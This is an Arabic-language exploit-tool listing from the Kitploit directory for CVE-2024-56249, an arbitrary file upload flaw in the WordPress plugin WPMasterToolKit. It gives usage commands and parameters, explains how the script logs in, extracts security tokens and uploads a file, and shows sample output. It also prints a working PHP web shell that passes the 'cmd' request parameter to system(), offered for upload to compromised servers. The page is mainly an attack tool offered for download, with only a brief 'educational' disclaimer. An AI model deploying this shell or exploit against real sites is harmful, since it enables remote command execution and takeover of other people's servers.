Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2024-56249 — إضافة WordPress WPMasterToolKit <= 1.13.1 - ثغرة رفع ملفات تعسفية | Kitploit
أدوات/GitHubGitHub/nxploited/cve-2024-56249
توليد الحمولةتحليل الثغرات الأمنيةالاستغلالشيل كوداستغلال تطبيقات الويبأمن الويباختبار الاختراق
GitHubnxploited/cve-2024-56249

CVE-2024-56249

إضافة WordPress WPMasterToolKit <= 1.13.1 - ثغرة رفع ملفات تعسفية

عرض المستودع
111منذ سنة واحدةلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

🛠️ أداة استغلال مجموعة أدوات ووردبريس الرئيسية (CVE-2024-56249)

🌟 نظرة عامة

يستغل هذا السكربت ثغرة رفع ملفات عشوائية (Arbitrary File Upload) في إضافة WPMasterToolKit الخاصة بووردبريس، مما يسمح للمهاجم برفع قشرة ويب (web shell) إلى الخادم. الثغرة موجودة في الإصدارات <= 1.13.1 من الإضافة.

📝 تفاصيل CVE

  • معرف CVE: CVE-2024-56249
  • تاريخ النشر: 2025-01-02
  • تاريخ التحديث: 2025-01-02
  • الوصف: ثغرة رفع غير مقيد لملف بنوع خطير (Unrestricted Upload of File with Dangerous Type) في إضافة Webdeclic WPMasterToolKit تسمح برفع قشرة ويب إلى خادم الويب.
  • CWE: CWE-434: رفع غير مقيد لملف بنوع خطير
  • درجة CVSS: 9.1 (حرجة)
  • متجه CVSS: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H

🚀 الاستخدام

لاستغلال هذه الثغرة، استخدم الأمر التالي:

root@kitploit:~
python CVE-2024-56249.py -u <URL> -un <USERNAME> -p <PASSWORD> -fn <FILENAME>

📋 المعاملات

  • -u / --url: رابط ووردبريس الهدف (مثال: http://192.168.100.74:888/wordpress)
  • -un / --username: اسم مستخدم مدير ووردبريس
  • -p / --password: كلمة مرور مدير ووردبريس
  • -fp / --filepath: مسار رفع الملف (الافتراضي: wp-content/uploads/2025/03)
  • -fn / --filename: اسم الملف المراد رفعه (الافتراضي: shell.php)

🧩 شرح السكربت

🔍 1. فحص الثغرة

يبدأ السكربت بفحص الرابط الهدف للتحقق مما إذا كان عرضة لـ CVE-2024-56249 عن طريق التحقق من إصدار إضافة WPMasterToolKit.

🔑 2. المصادقة على ووردبريس

ثم يحاول تسجيل الدخول إلى لوحة تحكم ووردبريس باستخدام بيانات الاعتماد المقدمة.

🛡️ 3. استخراج رموز الأمان

بعد تسجيل الدخول بنجاح، يستخرج السكربت رموز الأمان اللازمة (nonce و token) المطلوبة لرفع الملف.

📤 4. نشر الحمولة

يقوم برفع الملف المحدد (مثل قشرة ويب) إلى الخادم الهدف باستخدام الرموز المستخرجة.

✅ 5. التحقق من الرفع

أخيرًا، يتحقق السكربت مما إذا تم رفع الملف بنجاح من خلال التحقق من إمكانية الوصول إليه عبر الرابط الهدف.

📂 ملاحظة

تأكد من وضع ملف القشرة (مثل shell.php) في نفس المجلد الذي يوجد به السكربت قبل تشغيله. هذا ضروري لكي يتمكن السكربت من تحديد موقع الملف ورفعه بنجاح.

مثال لملف القشرة (shell.php)

root@kitploit:~
<?php
if(isset($_REQUEST['cmd'])){
    $cmd = ($_REQUEST['cmd']);
    system($cmd);
}
?>

💡 مثال

root@kitploit:~
python CVE-2024-56249.py -u http://target -un admin -p admin -fn shell.php

🖥️ المخرجات

root@kitploit:~
python CVE-2024-56249.py -u http://target -un admin -p admin -fn shell.php
[🔍] Detected plugin version: 1.13.1
[🔥] Target is VULNERABLE to CVE-2024-56249! Exploiting...
[🔑] Attempting to log in...
[✅] Authentication successful!
[📡] Extracting security tokens...
[✅] Extracted nonce: e4ae47c8d8
[✅] Extracted token: e4ae47c8d8
[📤] Attempting to upload shell.php to wp-content/uploads/2025/03...
[✅] Upload request sent successfully.
[🔥] Shell successfully uploaded! Access it here: http://target/wp-content/uploads/2025/03/shell.php

🛠️ استخدام السكربت

root@kitploit:~
usage: CVE-2025-1307.py [-h] -u URL -un USERNAME -p PASSWORD [-fp FILEPATH] [-fn FILENAME]

Master Toolkit Exploit CVE-2024-56249 #by Nxploit | Khaled Alenazi

options:
  -h, --help            show this help message and exit
  -u, --url URL         Target WordPress URL (e.g., http://192.168.100.74:888/wordpress4/)
  -un, --username USERNAME
                        WordPress admin username
  -p, --password PASSWORD
                        WordPress admin password
  -fp, --filepath FILEPATH
                        File upload path (default: wp-content/uploads/2025/03)
  -fn, --filename FILENAME
                        File name to upload (default: shell.php)

⚠️ إخلاء مسؤولية

هذه الأداة مخصصة للأغراض التعليمية فقط. استخدمها على مسؤوليتك الخاصة. المؤلف غير مسؤول عن أي إساءة استخدام أو ضرر ناتج عن هذه الأداة.


سكربت الاستغلال بواسطة Nxploit | Khaled Alenazi

تنزيل الأداة